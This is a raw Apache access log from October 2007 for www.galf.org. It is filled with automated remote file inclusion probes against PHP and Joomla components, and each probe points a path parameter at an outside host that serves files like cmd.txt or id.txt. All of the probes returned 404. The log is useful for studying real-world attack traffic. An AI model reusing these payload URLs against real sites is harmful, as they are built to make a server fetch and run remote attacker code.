69.93.209.250 - - [29/Oct/2007:12:00:54 -0700] "GET /logs/access_070910.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.34.32.66 - - [29/Oct/2007:12:01:02 -0700] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.uwmail.eu/mail/skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.34.32.66 - - [29/Oct/2007:12:01:02 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.uwmail.eu/mail/skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.34.32.66 - - [29/Oct/2007:12:01:03 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.uwmail.eu/mail/skin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.247.202.66 - - [29/Oct/2007:12:01:51 -0700] "GET //postscript/postscript.php?p_mode=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
80.247.202.66 - - [29/Oct/2007:12:01:51 -0700] "GET /logs//postscript/postscript.php?p_mode=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
69.93.209.250 - - [29/Oct/2007:12:04:13 -0700] "GET /logs/scripts.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:04:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.93.240.191 - - [29/Oct/2007:12:04:19 -0700] "GET /logs/mosConfig_absolute_path=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
81.93.240.191 - - [29/Oct/2007:12:04:20 -0700] "GET /mosConfig_absolute_path=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
80.58.205.45 - - [29/Oct/2007:12:04:34 -0700] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:04:51 -0700] "GET /logs/access_070924.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:04:51 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:06:20 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [29/Oct/2007:12:06:30 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.111.45.30 - - [29/Oct/2007:12:06:30 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:06:36 -0700] "GET /logs/access_070924.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.17.10 - - [29/Oct/2007:12:06:44 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
80.67.17.10 - - [29/Oct/2007:12:06:44 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:06:55 -0700] "GET /logs/scripts.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:12:07:23 -0700] "GET /logs/!scanhttp://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:12:07:23 -0700] "GET /!scanhttp://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.154.131.169 - - [29/Oct/2007:12:07:26 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
82.154.131.169 - - [29/Oct/2007:12:07:26 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:12:08:08 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [29/Oct/2007:12:08:08 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gigateen.com/sa? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.117.252.170 - - [29/Oct/2007:12:09:29 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
87.117.252.170 - - [29/Oct/2007:12:09:29 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
74.86.197.2 - - [29/Oct/2007:12:09:29 -0700] "GET /logs/access_071008.log/index1.php?p=http://www.armamidweekbattles.com/modules/Forums/cache/.../work.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.197.2 - - [29/Oct/2007:12:09:29 -0700] "GET /index1.php?p=http://www.armamidweekbattles.com/modules/Forums/cache/.../work.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.197.2 - - [29/Oct/2007:12:09:29 -0700] "GET /logs/index1.php?p=http://www.armamidweekbattles.com/modules/Forums/cache/.../work.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
217.172.33.99 - - [29/Oct/2007:12:12:32 -0700] "GET /logs//include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.172.33.99 - - [29/Oct/2007:12:12:33 -0700] "GET //include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.106.128.100 - - [29/Oct/2007:12:13:04 -0700] "GET /logs//include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.128.100 - - [29/Oct/2007:12:13:04 -0700] "GET //include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.53.138.150 - - [29/Oct/2007:12:13:30 -0700] "GET /logs/middle.php?page=http://www.imanvoice.com/audio/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [29/Oct/2007:12:13:30 -0700] "GET /middle.php?page=http://www.imanvoice.com/audio/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.121 - - [29/Oct/2007:12:13:33 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.75 - - [29/Oct/2007:12:13:54 -0700] "GET /logs/access_070618.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.133.238.228 - - [29/Oct/2007:12:14:52 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
220.133.238.228 - - [29/Oct/2007:12:14:53 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
208.53.138.150 - - [29/Oct/2007:12:15:00 -0700] "GET /logs/access_070723.log/middle.php?page=http://www.imanvoice.com/audio/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.17.10 - - [29/Oct/2007:12:15:16 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801"
80.67.17.10 - - [29/Oct/2007:12:15:16 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.801"
82.154.131.169 - - [29/Oct/2007:12:15:29 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.154.131.169 - - [29/Oct/2007:12:15:33 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
200.105.69.61 - - [29/Oct/2007:12:16:09 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://implanta.ru/html/ruploader/thumbs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.105.69.61 - - [29/Oct/2007:12:16:10 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://implanta.ru/html/ruploader/thumbs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:12:16:50 -0700] "GET /logs/access_070625.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.172.33.99 - - [29/Oct/2007:12:16:50 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.172.33.99 - - [29/Oct/2007:12:16:51 -0700] "GET /logs//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
220.133.238.228 - - [29/Oct/2007:12:17:09 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
220.133.238.228 - - [29/Oct/2007:12:17:09 -0700] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spyd0x.olympe-network.com/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
219.240.39.212 - - [29/Oct/2007:12:18:52 -0700] "GET /logs/access_071001.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.240.39.212 - - [29/Oct/2007:12:18:52 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
220.130.3.67 - - [29/Oct/2007:12:18:53 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
220.130.3.67 - - [29/Oct/2007:12:18:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.khabox.net/images/config.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.246.32.27 - - [29/Oct/2007:12:18:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://geneu.info/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
219.240.39.212 - - [29/Oct/2007:12:20:11 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.neoncomanda.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:12:20:49 -0700] "GET /logs//include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [29/Oct/2007:12:20:49 -0700] "GET //include.php?path[docroot]=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
198.66.208.57 - - [29/Oct/2007:12:20:58 -0700] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.53.138.150 - - [29/Oct/2007:12:21:45 -0700] "GET /logs/access.log/middle.php?page=http://www.imanvoice.com/audio/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:21:47 -0700] "GET /logs/access_070924.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:21:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.135.119 - - [29/Oct/2007:12:21:52 -0700] "GET /logs/http://www.woman.fromland.net//language/lang_german/r8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.135.119 - - [29/Oct/2007:12:21:52 -0700] "GET /http://www.woman.fromland.net//language/lang_german/r8.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.149.101.49 - - [29/Oct/2007:12:22:13 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
83.149.101.49 - - [29/Oct/2007:12:22:14 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.149.101.49 - - [29/Oct/2007:12:22:14 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.149.101.49 - - [29/Oct/2007:12:22:14 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.58.12 - - [29/Oct/2007:12:22:16 -0700] "GET /logs/access_070917.log/index2.php?option=com_joomlaboardhttp://www.pixguild.com//modules/Forums/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
72.32.58.12 - - [29/Oct/2007:12:22:16 -0700] "GET /index2.php?option=com_joomlaboardhttp://www.pixguild.com//modules/Forums/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.58.12 - - [29/Oct/2007:12:22:16 -0700] "GET /logs/index2.php?option=com_joomlaboardhttp://www.pixguild.com//modules/Forums/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.162.202.137 - - [29/Oct/2007:12:22:24 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.deerbrookonline.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.162.202.137 - - [29/Oct/2007:12:22:24 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.deerbrookonline.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.162.202.137 - - [29/Oct/2007:12:22:25 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.deerbrookonline.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.98.226.84 - - [29/Oct/2007:12:22:39 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.226.84 - - [29/Oct/2007:12:22:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.226.84 - - [29/Oct/2007:12:22:39 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.226.84 - - [29/Oct/2007:12:22:41 -0700] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.159.26.78 - - [29/Oct/2007:12:23:58 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.159.26.78 - - [29/Oct/2007:12:23:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.159.26.78 - - [29/Oct/2007:12:23:59 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.159.26.78 - - [29/Oct/2007:12:24:00 -0700] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.154.131.169 - - [29/Oct/2007:12:24:18 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://64.8.110.2/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.32 - - [29/Oct/2007:12:24:44 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:12:24:59 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:12:25:00 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.209.250 - - [29/Oct/2007:12:25:23 -0700] "GET /logs/scripts.log//modules/vwar/admin/admin.php?vwar_root=http://www.reachne.org//components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.195.11.193 - - [29/Oct/2007:12:25:33 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.162.202.137 - - [29/Oct/2007:12:26:00 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.deerbrookonline.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
198.66.208.57 - - [29/Oct/2007:12:26:06 -0700] "GET /logs/access_071001.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.tokyowww.com/alat/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.162.202.137 - - [29/Oct/2007:12:26:14 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.deerbrookonline.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
74.86.197.2 - - [29/Oct/2007:12:26:43 -0700] "GET /logs/access_070709.log/index1.php?p=http://www.armamidweekbattles.com/modules/Forums/cache/.../work.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [29/Oct/2007:12:26:46 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.111.45.30 - - [29/Oct/2007:12:26:57 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://store.pointclick.ws/vsadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.92.73.80 - - [29/Oct/2007:12:27:30 -0700] "GET /logs/access_070917.log/index2.php?option=com_joomlaboardhttp://211.155.235.169/sewam/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.92.73.80 - - [29/Oct/2007:12:27:30 -0700] "GET /index2.php?option=com_joomlaboardhttp://211.155.235.169/sewam/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.92.73.80 - - [29/Oct/2007:12:27:31 -0700] "GET /logs/index2.php?option=com_joomlaboardhttp://211.155.235.169/sewam/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.125.6 - - [29/Oct/2007:12:27:36 -0700] "GET /logs/access_070917.log/index2.php?option=com_joomlaboardhttp://usuarios.arnet.com.ar/adipasqua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.125.6 - - [29/Oct/2007:12:27:36 -0700] "GET /index2.php?option=com_joomlaboardhttp://usuarios.arnet.com.ar/adipasqua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.125.6 - - [29/Oct/2007:12:27:36 -0700] "GET /logs/index2.php?option=com_joomlaboardhttp://usuarios.arnet.com.ar/adipasqua/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.32.27 - - [29/Oct/2007:12:28:02 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://72.1.85.234/cmdinterface.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.107 - - [29/Oct/2007:12:28:24 -0700] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
204.11.234.20 - - [29/Oct/2007:12:28:36 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.111.176.32 - - [29/Oct/2007:12:29:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.162.202.137 - - [29/Oct/2007:12:29:37 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.deerbrookonline.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:12:31:04 -0700] "GET /logs/access_070723.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
190.70.107.144 - - [29/Oct/2007:12:31:04 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
190.70.107.144 - - [29/Oct/2007:12:31:04 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.eldesbande.com/hi5/date.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.148.36 - - [29/Oct/2007:12:32:17 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://sehospede.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:12:32:34 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.93.148.36 - - [29/Oct/2007:12:32:35 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sehospede.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.157.188.77 - - [29/Oct/2007:12:32:44 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.148.36 - - [29/Oct/2007:12:33:40 -0700] "GET /newspublish/include.php?path[docroot]=http://sehospede.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.148.36 - - [29/Oct/2007:12:33:53 -0700] "GET /!scanhttp://sehospede.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.148.36 - - [29/Oct/2007:12:33:55 -0700] "GET /!scanhttp://sehospede.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.122.11.226 - - [29/Oct/2007:12:34:22 -0700] "GET /logs/submissions.php/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.11.234.20 - - [29/Oct/2007:12:34:31 -0700] "GET /logs/access_070820.log/akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [29/Oct/2007:12:34:31 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
201.122.11.226 - - [29/Oct/2007:12:34:32 -0700] "GET /submissions.php/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://infected1249.iespana.es/asc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.148.36 - - [29/Oct/2007:12:34:53 -0700] "GET //include.php?path[docroot]=http://sehospede.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.180.250.121 - - [29/Oct/2007:12:35:09 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
